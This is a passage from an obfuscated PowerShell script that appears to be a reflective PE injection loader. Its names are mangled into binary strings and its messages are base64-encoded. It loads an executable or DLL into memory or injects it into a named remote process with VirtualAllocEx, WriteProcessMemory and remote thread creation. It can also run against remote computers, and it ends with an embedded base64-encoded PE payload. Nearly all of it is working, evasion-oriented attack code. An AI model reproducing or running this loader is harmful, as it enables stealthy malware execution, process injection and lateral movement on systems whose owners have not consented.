${_00110100101000100} | Add-Member -MemberType NoteProperty -Name EndAddress -Value ${01100100110010111}
${_00110100101000100} | Add-Member -MemberType NoteProperty -Name EffectivePEHandle -Value ${00001111011100111}
Write-Verbose "StartAddress: $(_00100010111110111 ${_10111111000001111}) EndAddress: $(_00100010111110111 ${01100100110010111})"
Write-Verbose $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('QwBvAHAAeQAgAFAARQAgAHMAZQBjAHQAaQBvAG4AcwAgAGkAbgAgAHQAbwAgAG0AZQBtAG8AcgB5AA==')))
_10000010011101000 -_00000000110100000 ${_00000000110100000} -_00110100101000100 ${_00110100101000100} -Win32Functions $Win32Functions -Win32Types $Win32Types
Write-Verbose $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('VQBwAGQAYQB0AGUAIABtAGUAbQBvAHIAeQAgAGEAZABkAHIAZQBzAHMAZQBzACAAYgBhAHMAZQBkACAAbwBuACAAdwBoAGUAcgBlACAAdABoAGUAIABQAEUAIAB3AGEAcwAgAGEAYwB0AHUAYQBsAGwAeQAgAGwAbwBhAGQAZQBkACAAaQBuACAAbQBlAG0AbwByAHkA')))
_01101011110101010 -_00110100101000100 ${_00110100101000100} -_10110001101101110 ${_10110001101101110} -Win32Constants $Win32Constants -Win32Types $Win32Types
Write-Verbose $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('SQBtAHAAbwByAHQAIABEAEwATAAnAHMAIABuAGUAZQBkAGUAZAAgAGIAeQAgAHQAaABlACAAUABFACAAdwBlACAAYQByAGUAIABsAG8AYQBkAGkAbgBnAA==')))
if (${01101001000001101} -eq $true)
_01001001100111111 -_00110100101000100 ${_00110100101000100} -Win32Functions $Win32Functions -Win32Types $Win32Types -Win32Constants $Win32Constants -_10010001100101011 ${_10010001100101011}
_01001001100111111 -_00110100101000100 ${_00110100101000100} -Win32Functions $Win32Functions -Win32Types $Win32Types -Win32Constants $Win32Constants
if (${01101001000001101} -eq $false)
if (${10111101111001110} -eq $true)
Write-Verbose $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('VQBwAGQAYQB0AGUAIABtAGUAbQBvAHIAeQAgAHAAcgBvAHQAZQBjAHQAaQBvAG4AIABmAGwAYQBnAHMA')))
_01000100111001001 -_00110100101000100 ${_00110100101000100} -Win32Functions $Win32Functions -Win32Constants $Win32Constants -Win32Types $Win32Types
Write-Verbose $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('UABFACAAYgBlAGkAbgBnACAAcgBlAGYAbABlAGMAdABpAHYAZQBsAHkAIABsAG8AYQBkAGUAZAAgAGkAcwAgAG4AbwB0ACAAYwBvAG0AcABhAHQAaQBiAGwAZQAgAHcAaQB0AGgAIABOAFgAIABtAGUAbQBvAHIAeQAsACAAawBlAGUAcABpAG4AZwAgAG0AZQBtAG8AcgB5ACAAYQBzACAAcgBlAGEAZAAgAHcAcgBpAHQAZQAgAGUAeABlAGMAdQB0AGUA')))
Write-Verbose $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('UABFACAAYgBlAGkAbgBnACAAbABvAGEAZABlAGQAIABpAG4AIAB0AG8AIABhACAAcgBlAG0AbwB0AGUAIABwAHIAbwBjAGUAcwBzACwAIABuAG8AdAAgAGEAZABqAHUAcwB0AGkAbgBnACAAbQBlAG0AbwByAHkAIABwAGUAcgBtAGkAcwBzAGkAbwBuAHMA')))
if (${01101001000001101} -eq $true)
[UInt32]${01101111010110100} = 0
${01100111110111001} = $Win32Functions.WriteProcessMemory.Invoke(${_10010001100101011}, ${00001111011100111}, ${_10111111000001111}, [UIntPtr](${_00110100101000100}.SizeOfImage), [Ref]${01101111010110100})
if (${01100111110111001} -eq $false)
Throw $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('VQBuAGEAYgBsAGUAIAB0AG8AIAB3AHIAaQB0AGUAIABzAGgAZQBsAGwAYwBvAGQAZQAgAHQAbwAgAHIAZQBtAG8AdABlACAAcAByAG8AYwBlAHMAcwAgAG0AZQBtAG8AcgB5AC4A')))
if (${_00110100101000100}.FileType -ieq $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('RABMAEwA'))))
if (${01101001000001101} -eq $false)
Write-Verbose $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('QwBhAGwAbABpAG4AZwAgAGQAbABsAG0AYQBpAG4AIABzAG8AIAB0AGgAZQAgAEQATABMACAAawBuAG8AdwBzACAAaQB0ACAAaABhAHMAIABiAGUAZQBuACAAbABvAGEAZABlAGQA')))
${10111110111100111} = _01101001110001101 (${_00110100101000100}.PEHandle) (${_00110100101000100}.IMAGE_NT_HEADERS.OptionalHeader.AddressOfEntryPoint)
${00010000011001100} = _00101111101010001 @([IntPtr], [UInt32], [IntPtr]) ([Bool])
${10100000001010101} = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer(${10111110111100111}, ${00010000011001100})
${10100000001010101}.Invoke(${_00110100101000100}.PEHandle, 1, [IntPtr]::Zero) | Out-Null
${10111110111100111} = _01101001110001101 (${00001111011100111}) (${_00110100101000100}.IMAGE_NT_HEADERS.OptionalHeader.AddressOfEntryPoint)
if (${_00110100101000100}.PE64Bit -eq $true)
${00001111110000110} = @(0x53, 0x48, 0x89, 0xe3, 0x66, 0x83, 0xe4, 0x00, 0x48, 0xb9)
${10101110011000010} = @(0xba, 0x01, 0x00, 0x00, 0x00, 0x41, 0xb8, 0x00, 0x00, 0x00, 0x00, 0x48, 0xb8)
${10101111011000000} = @(0xff, 0xd0, 0x48, 0x89, 0xdc, 0x5b, 0xc3)
${00001111110000110} = @(0x53, 0x89, 0xe3, 0x83, 0xe4, 0xf0, 0xb9)
${10101110011000010} = @(0xba, 0x01, 0x00, 0x00, 0x00, 0xb8, 0x00, 0x00, 0x00, 0x00, 0x50, 0x52, 0x51, 0xb8)
${10101111011000000} = @(0xff, 0xd0, 0x89, 0xdc, 0x5b, 0xc3)
${10100011000000001} = ${00001111110000110}.Length + ${10101110011000010}.Length + ${10101111011000000}.Length + (${01001001001010110} * 2)
${01101100010011100} = [System.Runtime.InteropServices.Marshal]::AllocHGlobal(${10100011000000001})
${10101000010001101} = ${01101100010011100}
_01011110000000101 -_00101110110110110 ${00001111110000110} -_10010100011101100 ${01101100010011100}
${01101100010011100} = _01101001110001101 ${01101100010011100} (${00001111110000110}.Length)
[System.Runtime.InteropServices.Marshal]::StructureToPtr(${00001111011100111}, ${01101100010011100}, $false)
${01101100010011100} = _01101001110001101 ${01101100010011100} (${01001001001010110})
_01011110000000101 -_00101110110110110 ${10101110011000010} -_10010100011101100 ${01101100010011100}
${01101100010011100} = _01101001110001101 ${01101100010011100} (${10101110011000010}.Length)
[System.Runtime.InteropServices.Marshal]::StructureToPtr(${10111110111100111}, ${01101100010011100}, $false)
${01101100010011100} = _01101001110001101 ${01101100010011100} (${01001001001010110})
_01011110000000101 -_00101110110110110 ${10101111011000000} -_10010100011101100 ${01101100010011100}
${01101100010011100} = _01101001110001101 ${01101100010011100} (${10101111011000000}.Length)
${00110110110011110} = $Win32Functions.VirtualAllocEx.Invoke(${_10010001100101011}, [IntPtr]::Zero, [UIntPtr][UInt64]${10100011000000001}, $Win32Constants.MEM_COMMIT -bor $Win32Constants.MEM_RESERVE, $Win32Constants.PAGE_EXECUTE_READWRITE)
if (${00110110110011110} -eq [IntPtr]::Zero)
Throw $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('VQBuAGEAYgBsAGUAIAB0AG8AIABhAGwAbABvAGMAYQB0AGUAIABtAGUAbQBvAHIAeQAgAGkAbgAgAHQAaABlACAAcgBlAG0AbwB0AGUAIABwAHIAbwBjAGUAcwBzACAAZgBvAHIAIABzAGgAZQBsAGwAYwBvAGQAZQA=')))
${01100111110111001} = $Win32Functions.WriteProcessMemory.Invoke(${_10010001100101011}, ${00110110110011110}, ${10101000010001101}, [UIntPtr][UInt64]${10100011000000001}, [Ref]${01101111010110100})
if ((${01100111110111001} -eq $false) -or ([UInt64]${01101111010110100} -ne [UInt64]${10100011000000001}))
Throw $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('VQBuAGEAYgBsAGUAIAB0AG8AIAB3AHIAaQB0AGUAIABzAGgAZQBsAGwAYwBvAGQAZQAgAHQAbwAgAHIAZQBtAG8AdABlACAAcAByAG8AYwBlAHMAcwAgAG0AZQBtAG8AcgB5AC4A')))
${01011010001111011} = _00100111111000100 -_10011010100110011 ${_10010001100101011} -_01110111110010110 ${00110110110011110} -Win32Functions $Win32Functions
${01111011110110011} = $Win32Functions.WaitForSingleObject.Invoke(${01011010001111011}, 20000)
if (${01111011110110011} -ne 0)
Throw $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('QwBhAGwAbAAgAHQAbwAgAEMAcgBlAGEAdABlAFIAZQBtAG8AdABlAFQAaAByAGUAYQBkACAAdABvACAAYwBhAGwAbAAgAEcAZQB0AFAAcgBvAGMAQQBkAGQAcgBlAHMAcwAgAGYAYQBpAGwAZQBkAC4A')))
$Win32Functions.VirtualFreeEx.Invoke(${_10010001100101011}, ${00110110110011110}, [UIntPtr][UInt64]0, $Win32Constants.MEM_RELEASE) | Out-Null
elseif (${_00110100101000100}.FileType -ieq $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('RQBYAEUA'))))
[IntPtr]${_10111110001100110} = [System.Runtime.InteropServices.Marshal]::AllocHGlobal(1)
[System.Runtime.InteropServices.Marshal]::WriteByte(${_10111110001100110}, 0, 0x00)
${10011010100101011} = _00001000001100111 -_00110100101000100 ${_00110100101000100} -Win32Functions $Win32Functions -Win32Constants $Win32Constants -_10110001000000101 ${_01011011000001101} -_10111110001100110 ${_10111110001100110}
[IntPtr]${01110101101011100} = _01101001110001101 (${_00110100101000100}.PEHandle) (${_00110100101000100}.IMAGE_NT_HEADERS.OptionalHeader.AddressOfEntryPoint)
Write-Verbose "Call EXE Main function. Address: $(_00100010111110111 ${01110101101011100}). Creating thread for the EXE to run in."
$Win32Functions.CreateThread.Invoke([IntPtr]::Zero, [IntPtr]::Zero, ${01110101101011100}, [IntPtr]::Zero, ([UInt32]0), [Ref]([UInt32]0)) | Out-Null
while($true)
[Byte]${11000000111011101} = [System.Runtime.InteropServices.Marshal]::ReadByte(${_10111110001100110}, 0)
if (${11000000111011101} -eq 1)
_01000010000010111 -_00010001100101000 ${10011010100101011} -Win32Functions $Win32Functions -Win32Constants $Win32Constants
Write-Verbose $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('RQBYAEUAIAB0AGgAcgBlAGEAZAAgAGgAYQBzACAAYwBvAG0AcABsAGUAdABlAGQALgA=')))
sleep -Seconds 1
return @(${_00110100101000100}.PEHandle, ${00001111011100111})
Function _00100000100110011
Param(
[Parameter(Position=0, Mandatory=$true)]
[IntPtr]
${_10111111000001111}
$Win32Constants = _10101001111100001
$Win32Functions = _01011100100111011
$Win32Types = _10100111101101101
${_00110100101000100} = _00011000111100111 -_10111111000001111 ${_10111111000001111} -Win32Types $Win32Types -Win32Constants $Win32Constants
if (${_00110100101000100}.IMAGE_NT_HEADERS.OptionalHeader.ImportTable.Size -gt 0)
[IntPtr]${00001111100101111} = _01101001110001101 ([Int64]${_00110100101000100}.PEHandle) ([Int64]${_00110100101000100}.IMAGE_NT_HEADERS.OptionalHeader.ImportTable.VirtualAddress)
while ($true)
${00001010000101100} = [System.Runtime.InteropServices.Marshal]::PtrToStructure(${00001111100101111}, [Type]$Win32Types.IMAGE_IMPORT_DESCRIPTOR)
if (${00001010000101100}.Characteristics -eq 0 `
-and ${00001010000101100}.FirstThunk -eq 0 `
-and ${00001010000101100}.ForwarderChain -eq 0 `
-and ${00001010000101100}.Name -eq 0 `
-and ${00001010000101100}.TimeDateStamp -eq 0)
Write-Verbose $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('RABvAG4AZQAgAHUAbgBsAG8AYQBkAGkAbgBnACAAdABoAGUAIABsAGkAYgByAGEAcgBpAGUAcwAgAG4AZQBlAGQAZQBkACAAYgB5ACAAdABoAGUAIABQAEUA')))
${00111101100010100} = [System.Runtime.InteropServices.Marshal]::PtrToStringAnsi((_01101001110001101 ([Int64]${_00110100101000100}.PEHandle) ([Int64]${00001010000101100}.Name)))
${10001010011100010} = $Win32Functions.GetModuleHandle.Invoke(${00111101100010100})
if (${10001010011100010} -eq $null)
Write-Warning $ExecutionContext.InvokeCommand.ExpandString([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('RQByAHIAbwByACAAZwBlAHQAdABpAG4AZwAgAEQATABMACAAaABhAG4AZABsAGUAIABpAG4AIABNAGUAbQBvAHIAeQBGAHIAZQBlAEwAaQBiAHIAYQByAHkALAAgAEQATABMAE4AYQBtAGUAOgAgACQAewAwADAAMQAxADEAMQAwADEAMQAwADAAMAAxADAAMQAwADAAfQAuACAAQwBvAG4AdABpAG4AdQBpAG4AZwAgAGEAbgB5AHcAYQB5AHMA'))) -WarningAction Continue
${01100111110111001} = $Win32Functions.FreeLibrary.Invoke(${10001010011100010})
if (${01100111110111001} -eq $false)
Write-Warning $ExecutionContext.InvokeCommand.ExpandString([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('VQBuAGEAYgBsAGUAIAB0AG8AIABmAHIAZQBlACAAbABpAGIAcgBhAHIAeQA6ACAAJAB7ADAAMAAxADEAMQAxADAAMQAxADAAMAAwADEAMAAxADAAMAB9AC4AIABDAG8AbgB0AGkAbgB1AGkAbgBnACAAYQBuAHkAdwBhAHkAcwAuAA=='))) -WarningAction Continue
${00001111100101111} = _01101001110001101 (${00001111100101111}) ([System.Runtime.InteropServices.Marshal]::SizeOf([Type]$Win32Types.IMAGE_IMPORT_DESCRIPTOR))
Write-Verbose $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('QwBhAGwAbABpAG4AZwAgAGQAbABsAG0AYQBpAG4AIABzAG8AIAB0AGgAZQAgAEQATABMACAAawBuAG8AdwBzACAAaQB0ACAAaQBzACAAYgBlAGkAbgBnACAAdQBuAGwAbwBhAGQAZQBkAA==')))
${10111110111100111} = _01101001110001101 (${_00110100101000100}.PEHandle) (${_00110100101000100}.IMAGE_NT_HEADERS.OptionalHeader.AddressOfEntryPoint)
${00010000011001100} = _00101111101010001 @([IntPtr], [UInt32], [IntPtr]) ([Bool])
${10100000001010101} = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer(${10111110111100111}, ${00010000011001100})
${10100000001010101}.Invoke(${_00110100101000100}.PEHandle, 0, [IntPtr]::Zero) | Out-Null
${01100111110111001} = $Win32Functions.VirtualFree.Invoke(${_10111111000001111}, [UInt64]0, $Win32Constants.MEM_RELEASE)
if (${01100111110111001} -eq $false)
Write-Warning $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('VQBuAGEAYgBsAGUAIAB0AG8AIABjAGEAbABsACAAVgBpAHIAdAB1AGEAbABGAHIAZQBlACAAbwBuACAAdABoAGUAIABQAEUAJwBzACAAbQBlAG0AbwByAHkALgAgAEMAbwBuAHQAaQBuAHUAaQBuAGcAIABhAG4AeQB3AGEAeQBzAC4A'))) -WarningAction Continue
Function _10110111100110100
$Win32Functions = _01011100100111011
$Win32Types = _10100111101101101
$Win32Constants = _10101001111100001
${_10010001100101011} = [IntPtr]::Zero
if ((${_10101000101011101} -ne $null) -and (${_10101000101011101} -ne 0) -and (${_00010101111010101} -ne $null) -and (${_00010101111010101} -ne ""))
Throw $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('QwBhAG4AJwB0ACAAcwB1AHAAcABsAHkAIABhACAAUAByAG8AYwBJAGQAIABhAG4AZAAgAFAAcgBvAGMATgBhAG0AZQAsACAAYwBoAG8AbwBzAGUAIABvAG4AZQAgAG8AcgAgAHQAaABlACAAbwB0AGgAZQByAA==')))
elseif (${_00010101111010101} -ne $null -and ${_00010101111010101} -ne "")
${00000111000001001} = @(ps -Name ${_00010101111010101} -ErrorAction SilentlyContinue)
if (${00000111000001001}.Count -eq 0)
Throw $ExecutionContext.InvokeCommand.ExpandString([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('QwBhAG4AJwB0ACAAZgBpAG4AZAAgAHAAcgBvAGMAZQBzAHMAIAAkAHsAXwAwADAAMAAxADAAMQAwADEAMQAxADEAMAAxADAAMQAwADEAfQA=')))
elseif (${00000111000001001}.Count -gt 1)
${00001100011100100} = ps | where { $_.Name -eq ${_00010101111010101} } | select ProcessName, Id, SessionId
echo ${00001100011100100}
Throw $ExecutionContext.InvokeCommand.ExpandString([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('TQBvAHIAZQAgAHQAaABhAG4AIABvAG4AZQAgAGkAbgBzAHQAYQBuAGMAZQAgAG8AZgAgACQAewBfADAAMAAwADEAMAAxADAAMQAxADEAMQAwADEAMAAxADAAMQB9ACAAZgBvAHUAbgBkACwAIABwAGwAZQBhAHMAZQAgAHMAcABlAGMAaQBmAHkAIAB0AGgAZQAgAHAAcgBvAGMAZQBzAHMAIABJAEQAIAB0AG8AIABpAG4AagBlAGMAdAAgAGkAbgAgAHQAbwAuAA==')))
${_10101000101011101} = ${00000111000001001}[0].ID
if ((${_10101000101011101} -ne $null) -and (${_10101000101011101} -ne 0))
${_10010001100101011} = $Win32Functions.OpenProcess.Invoke(0x001F0FFF, $false, ${_10101000101011101})
if (${_10010001100101011} -eq [IntPtr]::Zero)
Throw $ExecutionContext.InvokeCommand.ExpandString([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('QwBvAHUAbABkAG4AJwB0ACAAbwBiAHQAYQBpAG4AIAB0AGgAZQAgAGgAYQBuAGQAbABlACAAZgBvAHIAIABwAHIAbwBjAGUAcwBzACAASQBEADoAIAAkAHsAXwAxADAAMQAwADEAMAAwADAAMQAwADEAMAAxADEAMQAwADEAfQA=')))
Write-Verbose $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('RwBvAHQAIAB0AGgAZQAgAGgAYQBuAGQAbABlACAAZgBvAHIAIAB0AGgAZQAgAHIAZQBtAG8AdABlACAAcAByAG8AYwBlAHMAcwAgAHQAbwAgAGkAbgBqAGUAYwB0ACAAaQBuACAAdABvAA==')))
Write-Verbose $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('QwBhAGwAbABpAG4AZwAgAEkAbgB2AG8AawBlAC0ATQBlAG0AbwByAHkATABvAGEAZABMAGkAYgByAGEAcgB5AA==')))
${_10111111000001111} = [IntPtr]::Zero
if (${_10010001100101011} -eq [IntPtr]::Zero)
${10000100001100101} = _00111010101101100 -_00000000110100000 ${_00000000110100000} -_01011011000001101 ${_01011011000001101} -_00100110100011000 ${_00100110100011000}
${10000100001100101} = _00111010101101100 -_00000000110100000 ${_00000000110100000} -_01011011000001101 ${_01011011000001101} -_10010001100101011 ${_10010001100101011} -_00100110100011000 ${_00100110100011000}
if (${10000100001100101} -eq [IntPtr]::Zero)
Throw $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('VQBuAGEAYgBsAGUAIAB0AG8AIABsAG8AYQBkACAAUABFACwAIABoAGEAbgBkAGwAZQAgAHIAZQB0AHUAcgBuAGUAZAAgAGkAcwAgAE4AVQBMAEwA')))
${_10111111000001111} = ${10000100001100101}[0]
${00101011001110001} = ${10000100001100101}[1]
${_00110100101000100} = _00011000111100111 -_10111111000001111 ${_10111111000001111} -Win32Types $Win32Types -Win32Constants $Win32Constants
if ((${_00110100101000100}.FileType -ieq $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('RABMAEwA')))) -and (${_10010001100101011} -eq [IntPtr]::Zero))
switch (${_00000001011111110})
{
$([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('VwBTAHQAcgBpAG4AZwA='))) {
Write-Verbose $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('QwBhAGwAbABpAG4AZwAgAGYAdQBuAGMAdABpAG8AbgAgAHcAaQB0AGgAIABXAFMAdAByAGkAbgBnACAAcgBlAHQAdQByAG4AIAB0AHkAcABlAA==')))
[IntPtr]${00011000000011100} = _00000001101011101 -_10111111000001111 ${_10111111000001111} -_10100010000010100 $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('VwBTAHQAcgBpAG4AZwBGAHUAbgBjAA==')))
if (${00011000000011100} -eq [IntPtr]::Zero)
Throw $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('QwBvAHUAbABkAG4AJwB0ACAAZgBpAG4AZAAgAGYAdQBuAGMAdABpAG8AbgAgAGEAZABkAHIAZQBzAHMALgA=')))
${00101000000110000} = _00101111101010001 @() ([IntPtr])
${00110010010100110} = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer(${00011000000011100}, ${00101000000110000})
[IntPtr]${00011001001001111} = ${00110010010100110}.Invoke()
${01101110101100101} = [System.Runtime.InteropServices.Marshal]::PtrToStringUni(${00011001001001111})
echo ${01101110101100101}
}
$([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('UwB0AHIAaQBuAGcA'))) {
Write-Verbose $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('QwBhAGwAbABpAG4AZwAgAGYAdQBuAGMAdABpAG8AbgAgAHcAaQB0AGgAIABTAHQAcgBpAG4AZwAgAHIAZQB0AHUAcgBuACAAdAB5AHAAZQA=')))
[IntPtr]${00101111111011111} = _00000001101011101 -_10111111000001111 ${_10111111000001111} -_10100010000010100 $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('UwB0AHIAaQBuAGcARgB1AG4AYwA=')))
if (${00101111111011111} -eq [IntPtr]::Zero)
Throw $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('QwBvAHUAbABkAG4AJwB0ACAAZgBpAG4AZAAgAGYAdQBuAGMAdABpAG8AbgAgAGEAZABkAHIAZQBzAHMALgA=')))
${00001101001110000} = _00101111101010001 @() ([IntPtr])
${00001100100111001} = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer(${00101111111011111}, ${00001101001110000})
[IntPtr]${00011001001001111} = ${00001100100111001}.Invoke()
${01101110101100101} = [System.Runtime.InteropServices.Marshal]::PtrToStringAnsi(${00011001001001111})
echo ${01101110101100101}
}
$([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('VgBvAGkAZAA='))) {
Write-Verbose $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('QwBhAGwAbABpAG4AZwAgAGYAdQBuAGMAdABpAG8AbgAgAHcAaQB0AGgAIABWAG8AaQBkACAAcgBlAHQAdQByAG4AIAB0AHkAcABlAA==')))
[IntPtr]${00000111110101100} = _00000001101011101 -_10111111000001111 ${_10111111000001111} -_10100010000010100 $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('VgBvAGkAZABGAHUAbgBjAA==')))
if (${00000111110101100} -eq [IntPtr]::Zero)
Throw $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('QwBvAHUAbABkAG4AJwB0ACAAZgBpAG4AZAAgAGYAdQBuAGMAdABpAG8AbgAgAGEAZABkAHIAZQBzAHMALgA=')))
${10000010000011101} = _00101111101010001 @() ([Void])
${10010101100100111} = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer(${00000111110101100}, ${10000010000011101})
${10010101100100111}.Invoke() | Out-Null
}
}
elseif ((${_00110100101000100}.FileType -ieq $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('RABMAEwA')))) -and (${_10010001100101011} -ne [IntPtr]::Zero))
${00000111110101100} = _00000001101011101 -_10111111000001111 ${_10111111000001111} -_10100010000010100 $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('VgBvAGkAZABGAHUAbgBjAA==')))
if ((${00000111110101100} -eq $null) -or (${00000111110101100} -eq [IntPtr]::Zero))
Throw $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('VgBvAGkAZABGAHUAbgBjACAAYwBvAHUAbABkAG4AJwB0ACAAYgBlACAAZgBvAHUAbgBkACAAaQBuACAAdABoAGUAIABEAEwATAA=')))
${00000111110101100} = _10000100001010111 ${00000111110101100} ${_10111111000001111}
${00000111110101100} = _01101001110001101 ${00000111110101100} ${00101011001110001}
${01011010001111011} = _00100111111000100 -_10011010100110011 ${_10010001100101011} -_01110111110010110 ${00000111110101100} -Win32Functions $Win32Functions
if (${_10010001100101011} -eq [IntPtr]::Zero -and ${_00110100101000100}.FileType -ieq $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('RABMAEwA'))))
_00100000100110011 -_10111111000001111 ${_10111111000001111}
${01100111110111001} = $Win32Functions.VirtualFree.Invoke(${_10111111000001111}, [UInt64]0, $Win32Constants.MEM_RELEASE)
if (${01100111110111001} -eq $false)
Write-Warning $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('VQBuAGEAYgBsAGUAIAB0AG8AIABjAGEAbABsACAAVgBpAHIAdAB1AGEAbABGAHIAZQBlACAAbwBuACAAdABoAGUAIABQAEUAJwBzACAAbQBlAG0AbwByAHkALgAgAEMAbwBuAHQAaQBuAHUAaQBuAGcAIABhAG4AeQB3AGEAeQBzAC4A'))) -WarningAction Continue
Write-Verbose $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('RABvAG4AZQAhAA==')))
_10110111100110100
Function _10110111100110100
if (($PSCmdlet.MyInvocation.BoundParameters[$([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('RABlAGIAdQBnAA==')))] -ne $null) -and $PSCmdlet.MyInvocation.BoundParameters[$([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('RABlAGIAdQBnAA==')))].IsPresent)
$DebugPreference = $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('QwBvAG4AdABpAG4AdQBlAA==')))
Write-Verbose $ExecutionContext.InvokeCommand.ExpandString([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('UABvAHcAZQByAFMAaABlAGwAbAAgAFAAcgBvAGMAZQBzAHMASQBEADoAIAAkAFAASQBEAA==')))
${00010101111010011} = (${_00000000110100000}[0..1] | % {[Char] $_}) -join ''
if (${00010101111010011} -ne 'MZ')
throw $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('UABFACAAaQBzACAAbgBvAHQAIABhACAAdgBhAGwAaQBkACAAUABFACAAZgBpAGwAZQAuAA==')))
if (-not ${_00101011011011001}) {
${_00000000110100000}[0] = 0
${_00000000110100000}[1] = 0
if (${_01011011000001101} -ne $null -and ${_01011011000001101} -ne '')
${_01011011000001101} = $ExecutionContext.InvokeCommand.ExpandString([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('UgBlAGYAbABlAGMAdABpAHYAZQBFAHgAZQAgACQAewBfADAAMQAwADEAMQAwADEAMQAwADAAMAAwADAAMQAxADAAMQB9AA==')))
${_01011011000001101} = $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('UgBlAGYAbABlAGMAdABpAHYAZQBFAHgAZQA=')))
if (${_00101101101110100} -eq $null -or ${_00101101101110100} -imatch $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('XgBcAHMAKgAkAA=='))))
icm -ScriptBlock ${10100010000001110} -ArgumentList @(${_00000000110100000}, ${_00000001011111110}, ${_10101000101011101}, ${_00010101111010101},${_00100110100011000})
icm -ScriptBlock ${10100010000001110} -ArgumentList @(${_00000000110100000}, ${_00000001011111110}, ${_10101000101011101}, ${_00010101111010101},${_00100110100011000}) -ComputerName ${_00101101101110100}
_10110111100110100
${00010111111101011} = $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('VABWAHEAUQBBAEEATQBBAEEAQQBBAEUAQQBBAEEAQQAvAC8AOABBAEEATABnAEEAQQBBAEEAQQBBAEEAQQBBAFEAQQBBAEEAQQBBAEEAQQBBAEEAQQBBAEEAQQBBAEEAQQBBAEEAQQBBAEEAQQBBAEEAQQBBAEEAQQBBAEEAQQBBAEEAQQBBAEEAQQBBAEEAQQBBAEEAQQBBAEEAQQBBAEMAQQBFAEEAQQBBADQAZgB1AGcANABBAHQAQQBuAE4ASQBiAGcAQgBUAE0AMABoAFYARwBoAHAAYwB5AEIAdwBjAG0AOQBuAGMAbQBGAHQASQBHAE4AaABiAG0ANQB2AGQAQwBCAGkAWgBTAEIAeQBkAFcANABnAGEAVwA0AGcAUgBFADkAVABJAEcAMQB2AFoARwBVAHUARABRADAASwBKAEEAQQBBAEEAQQBBAEEAQQBBAEIAYQBUAHIAeQBIAEgAaQAvAFMAMQBCADQAdgAwAHQAUQBlAEwAOQBMAFUARgAxAGQAQgAxAEIAQQB2ADAAdABTAHEAUgBkAGYAVgBCAHkALwBTADEASwBwAEYAMQB0AFUAVQBMADkATABVAHEAawBYAFIAMQBSAHcAdgAwAHQAUwBxAFIAZABQAFYARwBpAC8AUwAxAEgAdABKADAAOQBVAFIATAA5AEwAVQBIAGkALwBUADEASABNAHYAMAB0AFIAcQBSAE4AdgBWAEgAUwAvAFMAMQBHAHAARQBMAGQAUQBmAEwAOQBMAFUASABpADkARgAxAEIAOAB2ADAAdABSAHEAUgBOAEQAVgBIAHkALwBTADEARgBKAHAAWQAyAGcAZQBMADkATABVAEEAQQBBAEEAQQBBAEEAQQBBAEEAQQBBAEEAQQBBAEEAQQBBAEEAQQBBAEEAQQBBAEEAQQBBAEEAQQBBAEE
